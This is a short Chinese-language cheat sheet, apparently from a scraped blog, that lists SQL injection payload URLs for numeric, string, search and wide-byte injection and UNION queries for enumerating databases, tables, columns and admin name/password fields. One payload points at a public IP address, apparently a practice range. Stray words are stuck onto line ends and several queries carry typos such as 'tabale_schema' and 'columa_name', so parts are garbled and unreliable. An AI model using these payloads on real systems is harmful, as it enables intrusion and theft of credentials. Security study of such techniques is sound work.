SQL注入的各類類型的檢測方式

#SQL注入各個類型檢測方式

http://127.0.0.1/day6/1.php?id=1 union select 1,name,pass from admin 數字型

數字型不用特地加字符,直接 and1=2檢測是否有注入點;php

http://127.0.0.1/day6/1.php?key=-test' union select 1,name,pass from admin  --+  字符型

字符型須要在'xx--+ 中間輸入命令,' and 1=2 --+ 檢測是否有注入點;sql

http://127.0.0.1/day6/2.php?keyword=test %' order by 3 --+  搜索型

搜索型須要在 %'xx --+ 中間輸入命令,%' and 1=2 --+ 檢測是否有注入點;數據庫

http://103.238.227.13:10083/?id=1 %df%27 union select 1,schema_name from information_schema.schemata %23 查詢數據庫

寬字節型須要在 %df%27 xx %23中間輸入命令,%df%27 and 1=2 %23 檢測是否有注入點,查詢列表值得時候’‘要用 0x十六進值 代替;code


聯合查詢數據庫名,表名,列值,內容方式:

查詢數據庫orm

http://xxxxxx? union select null,schema_name,null from information_schema.schemata

查詢當前數據庫:io

http://xxxxxx? union select 1,database(),null

查詢當前版本信息:table

http://xxxxxx? union select 1,user,@@version,null

查詢數據表:form

http://xxxxxx? union select null,table_name,null from information_schema.tables where table_schema='xxx'

查詢數據字段:test

http://xxxxxx? union select null,group_concat(column_name),null from information_schema.columns where tabale_schema='xxx' and table_name='xxxx'

查詢詳細信息:select

http://xxxxxx? union select null,column_name,null from schema_name.columa_name
相關文章
相關標籤/搜索